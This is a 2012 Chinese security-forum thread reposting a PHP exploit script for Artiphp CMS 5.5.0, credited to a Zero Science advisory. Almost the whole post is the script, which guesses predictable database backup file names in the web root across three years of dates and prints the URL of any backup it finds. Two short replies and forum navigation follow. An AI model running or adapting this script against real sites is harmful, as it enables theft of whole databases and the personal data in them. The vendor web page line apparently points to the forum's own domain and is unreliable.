查看: 11306|回复: 2

Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

[复制链接]
  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2012-5-18 23:06:26 | 显示全部楼层 |阅读模式
    1. <?php  

    2.    

    3. /*  

    4.    

    5. Artiphp CMS 5.5.0 Database Backup Disclosure Exploit  

    6.    

    7.    

    8. Vendor: Artiphp  

    9. Product web page: http://www.ihonker.org
    10. Affected version: 5.5.0 Neo (r422)  

    11.    

    12. Summary: Artiphp is a content management system (CMS) open  

    13. and free to create and manage your website.  

    14.    

    15. Desc: Artiphp stores database backups using backupDB() utility  

    16. with a predictable file name inside the web root, which can be  

    17. exploited to disclose sensitive information by downloading the  

    18. file. The backup is located in '/artzone/artpublic/database/'  

    19. directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.  

    20.    

    21. Tested on: Microsoft Windows XP Professional SP3 (EN)  

    22.            Apache 2.2.21  

    23.            PHP 5.3.8 / 5.3.9  

    24.            MySQL 5.5.20  

    25.    

    26.    

    27. Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  

    28.                             @zeroscience  

    29.    

    30.    

    31. Advisory ID: ZSL-2012-5091  

    32. Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php  

    33.    

    34.    

    35. 15.05.2012  

    36.    

    37. */  

    38.    

    39. error_reporting(0);  

    40.    

    41. print "\no==========================================================o\n";  

    42. print "|                                                          |";  

    43. print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit     |\n";  

    44. print "|                                                          |\n";  

    45. print "|\t\t\tby LiquidWorm                      |\n";  

    46. print "|                                                          |";  

    47. print "\no==========================================================o\n";  

    48.    

    49. if ($argc < 3)  

    50. {  

    51.     print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";  

    52.     die();  

    53. }  

    54.    

    55. $godina_array = array('2012','2011','2010');  

    56.    

    57. $mesec_array = array('12','11','10','09',  

    58.              '08','07','06','05',  

    59.              '04','03','02','01');  

    60.    

    61. $dn_array = array('31','30','29','28','27','26',  

    62.           '25','24','23','22','21','20',  

    63.           '19','18','17','16','15','14',  

    64.           '13','12','11','10','09','08',  

    65.           '07','06','05','04','03','02',  

    66.           '01');  

    67.    

    68. $backup_array = array('full','structure','partial');  

    69.    

    70. $host = $argv[1];  

    71. $port = intval($argv[2]);  

    72. $path = "/artiphp/artzone/artpublic/database/"; // change per need.  

    73.    

    74. $alert1 = "\033[0;31m";  

    75. $alert2 = "\033[0;37m";  

    76.    

    77. foreach($godina_array as $godina)  

    78. {  

    79.     print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";  

    80.     sleep(2);  

    81.     foreach($mesec_array as $mesec)  

    82.     {  

    83.         foreach($dn_array as $dn)  

    84.         {  

    85.             print "~";  

    86.             foreach($backup_array as $backup)  

    87.             {  

    88.                 if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))  

    89.                 {  

    90.                     print "\n\n\x20[!] DB backup file discovered!\n\n";  

    91.                     echo $alert1;  

    92.                     print "\x20==>\x20";  

    93.                     echo $alert2;  

    94.                     die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");  

    95.                 }  

    96.             }  

    97.         }  

    98.     }  

    99. }  

    100.    

    101. print "\n\n\x20[*] Zero findings.\n\n\n"  

    102.    

    103. ?>
    复制代码
    回复

    使用道具 举报

    该用户从未签到

    发表于 2012-5-22 22:52:39 | 显示全部楼层
    看不懂的路过
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2022-3-19 16:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2012-5-23 23:48:47 | 显示全部楼层
    看不懂
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-4 02:02 , Processed in 0.024421 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部